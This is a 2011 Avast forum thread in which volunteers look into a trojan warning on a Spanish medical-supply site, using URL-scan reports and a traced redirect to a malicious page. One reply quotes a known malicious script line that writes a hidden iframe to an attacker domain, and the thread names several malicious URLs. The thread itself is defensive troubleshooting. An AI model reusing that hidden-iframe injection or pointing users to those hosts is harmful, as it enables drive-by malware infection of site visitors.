Avast WEBforum
Other => Viruses and worms => Topic started by: isfere on August 11, 2011, 12:09:24 AM
-
URL http://www.lineamedicahospitalaria.es/clasificaciones.aspx?IdC=C3&Id=18
http://www.lineamedicahospitalaria.es is a good site.
Detected some kind of trojan.
thksn
-
You can report a possible FP here: http://www.avast.com/contact-form.php?loadStyles
Report 2011-08-11 01:48:00 (GMT 1)
Website lineamedicahospitalaria.es
Domain Hash 6d9aa04ce3e59c5547e1d0a8f0f31aa7
IP Address 216.245.208.130 [SCAN]
IP Hostname wnhsolar2.winnethost.us
IP Country US (United States)
AS Number 46475
AS Name LIMESTONENETWORKS - Limestone Networks, Inc.
Detections 0 / 23 (0 %)
Status CLEAN
Report 2011-08-11 08:23:09 (GMT 1)
IP Address 216.245.208.130
IP Hostname wnhsolar2.winnethost.us
IP Country US
AS Number N/A
AS Name N/A
Detections 0 / 26 (0 %)
Status CLEAN
-
See a report here: http://urlquery.net/report.php?id=1565
See the report here: http://wepawet.cs.ucsb.edu/view.php?hash=894c71ec08d2b2c85572231b9846182d&t=1313069947&type=js
No zeroiframes detected!
Check took 5.28 seconds
(Level: 0) Url checked:
-http://www.lineamedicahospitalaria.es/
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//webresource.axd?d=6qe_vmeilcewdagf7eyu0ghk92qf5wf3psuhwpr39i-ymqm7mpodwmxd9u27cfvv8xjftiugpdq9lhm1ijtbc2cfozc1&t=634445528553043750
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//scriptresource.axd?d=zhnl9vw3rnapmh0jaduul7yfxlk_57vxxubtbtxk7ylonuialy5v_xu6zxvv8nr38zgni_8oocs-jtvwzxdh9ntqqifs0vpy9a2kcxypdoa4yj7n0qqrs1ypdiml5miikw_fya2&t=ffffffffce71825b
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//scriptresource.axd?d=aiuzvw7wolarf3qdjgfwvy833ahsi6-fmlg-bei8srst3epmrih_iz66rz8r6flpn_gvs2iabkjjrm08-ukfpmxk4jyce5zxtzrlzqrprhhobhdbq6807xqenzjzighs9ile1fvx58jhc8xrjm4tgdouhti1&t=ffffffffd6ab16ef
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//scriptresource.axd?d=96d7y8rf2hp8taae1kn84jprsj3li1bonvux_kvjcqzqw-xwuap0pjg5nvt5mwgcvzn8bzhfmpwkisomvk8g_m8-kfn2ymyiystrjgukydanufmicru9xnjcxqboqqxzcl-dxw6rbkkldtckgmzelbgc0cvlgb39dj0z9kt3jzve4nan0&t=ffffffffd6ab16ef
Blank page / could not connect
No ad codes identified
polonus
-
Hello,
we are detecting there
jhkung.com
http://www.virustotal.com/url-scan/report.html?id=145832090628ce26879c0b843e5a45a0-1313068011
-
Yes, malware found in the url:
-http://jhgukn.com/ur.php
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjs3023
document.write("<iframe src='-http://frsskillnet.cu.cc/showthread.php?t=98761267' style='display:none;'></iframe>") blocked by the avast Network Shield as URL:Mal
but I get a 404. Page not found for the site you mention. But it definitely was infected on 2011-08-10, see: http://www.google.com/safebrowsing/diagnostic?site=jhgukn.com/ur.php
lot of malicious url's and badware and current events here reported, see:
http://sitevet.com/db/asn/AS43134 & http://www.google.com/safebrowsing/diagnostic?site=AS:43134
polonus
-
Hi guys.
I help in the Non-English forum, and I asked the OP to post the URL here because my Avast6.0.1203 did not detected anything and Virus Total came out clean when I scanned the URL yesterday, wierd that now it is detected.
He is running Avast 4 and he said that he could enter in the URL with the work PC but not at his home (both machines run Avast)(work PC runs McAfee).
He posted a screenshot of the warning:
http://forum.avast.com/index.php?topic=82882.msg676826#msg676826
I adviced him to check his PC for infection since he has a temp file that is making some kind of redirect to jhgukn.com/ur.php and that is what Avast is detecting. What else can I tell him ?
Thanks.
Added: When he tries to go to:
hXXp://www.lineamedicahospitalaria.es/clasificaciones.aspx?IdC=C3&Id=18
He gets redirected to jhgukn.com/ur.php and that is infected
-
thkns iroc9555
Thanks for making the explanation for my
-
Hi iroc9555,
Thanks for explaining the redirect to the initial poster. Good we all are protected by the avast shields,
polonus
-
(http://img819.imageshack.us/img819/9831/lineamedicamalware.jpg) (http://imageshack.us/photo/my-images/819/lineamedicamalware.jpg/)
Uploaded with ImageShack.us (http://imageshack.us)
malware antybytes free,
and my avast 4.8 my web shield is 4.8.
http://www.lineamedicahospitalaria.es is good, but when yo want go to other section
example "antisepticos"
thanks fot everybody by their time.
-
malware antybytes free,
and my avast 4.8 my web shield is 4.8.
It seems you are running Malwarebytes Pro from your image ???
Why are you not running avast 6.0.1203 ???
-
Please, upload (attach) the avast log:
C:\ProgramData\AVAST Software\Avast\log\Setup.log
or C:\Program Files\Alwil Software\Avast5\Setup\setup.log
If the file is too big for the forum, post the last 400-500 lines of it.
-
http://xxx.megaupload.com/?d=O8IECRBB
in this link i have just upload, that log.
thkns.